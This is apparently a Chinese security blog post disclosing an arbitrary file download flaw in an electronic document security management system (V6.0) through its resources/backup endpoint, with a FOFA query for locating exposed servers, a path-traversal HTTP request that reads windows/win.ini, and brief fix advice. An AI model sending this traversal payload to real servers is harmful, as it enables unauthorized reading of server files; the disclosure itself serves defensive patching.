电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞,攻击者可通过该漏洞获取服务器所有文件信息。

搜索语法

FOFA:body="docsafe/docsafe.nocache.js"

漏洞再现

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br, zstd

Accept-Language: zh-CN,zh;q=0.9

Connection: keep-alive

修复建议

禁用特殊字符,限制文件读取路径。关注厂商官网信息,及时更新版本

相关推荐
xyq20243 分钟前
TypeScript 命名空间
开发语言
志栋智能4 分钟前
超自动化巡检:应对复杂IT环境的必然选择
运维·网络·安全·web安全·自动化
2301_810160955 分钟前
C++与物联网开发
开发语言·c++·算法
真夜7 分钟前
关于对echart盒子设置百分比读取的宽高没有撑开盒子解决方案
前端
sxlishaobin8 分钟前
Java I/O 模型详解:BIO、NIO、AIO
java·开发语言·nio
cm6543209 分钟前
基于C++的操作系统开发
开发语言·c++·算法
ArturiaZ12 分钟前
【day57】
开发语言·c++·算法
wjs202414 分钟前
XML 技术
开发语言
彭于晏Yan15 分钟前
Spring AI(二):入门使用
java·spring boot·spring·ai
沪漂阿龙17 分钟前
Python 面向对象编程完全指南:从新手到高手的进阶之路
开发语言·python·microsoft